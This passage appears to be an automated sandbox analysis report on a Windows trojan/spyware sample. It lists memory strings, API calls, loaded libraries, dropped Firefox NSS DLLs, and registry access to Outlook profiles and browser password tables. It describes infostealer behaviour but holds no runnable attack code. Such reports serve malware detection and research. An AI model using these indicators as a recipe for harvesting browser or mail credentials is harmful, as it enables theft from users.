Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: GCGDGHCB.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/eBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VS
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

PE file has a writeable .text section

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Contains functionality to call native functions

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C53B700
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C53B8C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C53B910
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C4DF280

Detected potential crypto function

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D35A0	0_2_6C4D35A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54545C	0_2_6C54545C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E5440	0_2_6C4E5440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515C10	0_2_6C515C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522C10	0_2_6C522C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54AC00	0_2_6C54AC00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54542B	0_2_6C54542B
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E64C0	0_2_6C4E64C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD4D0	0_2_6C4FD4D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C516CF0	0_2_6C516CF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DD4E0	0_2_6C4DD4E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5334A0	0_2_6C5334A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53C4A0	0_2_6C53C4A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C500512	0_2_6C500512
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFD00	0_2_6C4EFD00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C510DD0	0_2_6C510DD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5385F0	0_2_6C5385F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C513E50	0_2_6C513E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F4640	0_2_6C4F4640
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522E4E	0_2_6C522E4E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F9E50	0_2_6C4F9E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C546E63	0_2_6C546E63
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC670	0_2_6C4DC670
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517E10	0_2_6C517E10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C525600	0_2_6C525600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C539E30	0_2_6C539E30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5476E3	0_2_6C5476E3
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DBEF0	0_2_6C4DBEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFEF0	0_2_6C4EFEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53E680	0_2_6C53E680
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F5E90	0_2_6C4F5E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C534EA0	0_2_6C534EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517710	0_2_6C517710
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E9F00	0_2_6C4E9F00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C506FF0	0_2_6C506FF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DDFE0	0_2_6C4DDFE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5277A0	0_2_6C5277A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F8850	0_2_6C4F8850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD850	0_2_6C4FD850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51F070	0_2_6C51F070
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E7810	0_2_6C4E7810
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51B820	0_2_6C51B820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C524820	0_2_6C524820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5450C7	0_2_6C5450C7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FC0E0	0_2_6C4FC0E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5158E0	0_2_6C5158E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5060A0	0_2_6C5060A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FA940	0_2_6C4FA940
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C52B970	0_2_6C52B970
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54B170	0_2_6C54B170
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ED960	0_2_6C4ED960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515190	0_2_6C515190
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C532990	0_2_6C532990
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50D9B0	0_2_6C50D9B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC9A0	0_2_6C4DC9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C519A60	0_2_6C519A60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C518AC0	0_2_6C518AC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51E2F0	0_2_6C51E2F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F1AF0	0_2_6C4F1AF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54BA90	0_2_6C54BA90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C542AB0	0_2_6C542AB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D22A0	0_2_6C4D22A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C504AA0	0_2_6C504AA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ECAB0	0_2_6C4ECAB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D5340	0_2_6C4D5340
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EC370	0_2_6C4EC370
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51D320	0_2_6C51D320
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5453C8	0_2_6C5453C8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF380	0_2_6C4DF380
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AC60	0_2_6C58AC60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65AC30	0_2_6C65AC30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C646C00	0_2_6C646C00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5DECD0	0_2_6C5DECD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C57ECC0	0_2_6C57ECC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C64ED70	0_2_6C64ED70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6AAD50	0_2_6C6AAD50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C708D20	0_2_6C708D20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C70CDC0	0_2_6C70CDC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C584DB0	0_2_6C584DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C616D90	0_2_6C616D90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61EE70	0_2_6C61EE70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C660E20	0_2_6C660E20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AEC0	0_2_6C58AEC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620EC0	0_2_6C620EC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C606E90	0_2_6C606E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C642F70	0_2_6C642F70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5EEF40	0_2_6C5EEF40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C586F10	0_2_6C586F10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0F20	0_2_6C6C0F20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65EFF0	0_2_6C65EFF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C580FE0	0_2_6C580FE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C8FB0	0_2_6C6C8FB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58EFB0	0_2_6C58EFB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C654840	0_2_6C654840
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A820	0_2_6C60A820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D0820	0_2_6C5D0820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6868E0	0_2_6C6868E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B8960	0_2_6C5B8960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D6900	0_2_6C5D6900
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C69C9E0	0_2_6C69C9E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B49F0	0_2_6C5B49F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6109A0	0_2_6C6109A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6409B0	0_2_6C6409B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FCA70	0_2_6C5FCA70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C638A30	0_2_6C638A30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C62EA00	0_2_6C62EA00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FEA80	0_2_6C5FEA80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C686BE0	0_2_6C686BE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620BA0	0_2_6C620BA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C598460	0_2_6C598460
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A430	0_2_6C60A430
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E4420	0_2_6C5E4420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5C64D0	0_2_6C5C64D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61A4D0	0_2_6C61A4D0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5A3620 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C70DAE0 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 00EE43D0 appears 315 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C7009D0 appears 121 times

Sample file is different than original file name gathered from version info

Source: i3NmF0obCm.exe, 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs i3NmF0obCm.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs i3NmF0obCm.exe

Uses 32bit PE files

Source: i3NmF0obCm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C537030

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF6550 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_00EF6550

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: i3NmF0obCm.exe, 00000000.00000003.1729483221.0000000021854000.00000004.00000020.00020000.00000000.sdmp, JJKJDAEBFCBKECBGDBFC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

